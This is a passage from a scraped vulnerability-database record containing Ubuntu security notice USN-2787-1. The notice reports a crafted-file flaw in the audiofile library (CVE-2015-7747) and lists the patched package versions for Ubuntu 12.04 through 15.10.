2015\r\n\r\naudiofile vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\naudiofile could be made to crash or run programs as your login if it\r\nopened a specially crafted file.\r\n\r\nSoftware Description:\r\n- audiofile: Open-source version of the SGI audiofile library\r\n\r\nDetails:\r\n\r\nFabrizio Gennari discovered that audiofile incorrectly handled changing\r\nboth the sample format and the number of channels. If a user or automated\r\nsystem were tricked into processing a specially crafted file, audiofile\r\ncould be made to crash, leading to a denial of service, or possibly execute\r\narbitrary code.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n libaudiofile1 0.3.6-2ubuntu0.15.10.1\r\n\r\nUbuntu 15.04:\r\n libaudiofile1 0.3.6-2ubuntu0.15.04.1\r\n\r\nUbuntu 14.04 LTS:\r\n libaudiofile1 0.3.6-2ubuntu0.14.04.1\r\n\r\nUbuntu 12.04 LTS:\r\n libaudiofile1 0.3.3-2ubuntu0.1\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2787-1\r\n CVE-2015-7747\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.15.10.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.15.04.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.14.04.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.3-2ubuntu0.1\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32652", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32652", "title": "[USN-2787-1] audiofile vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}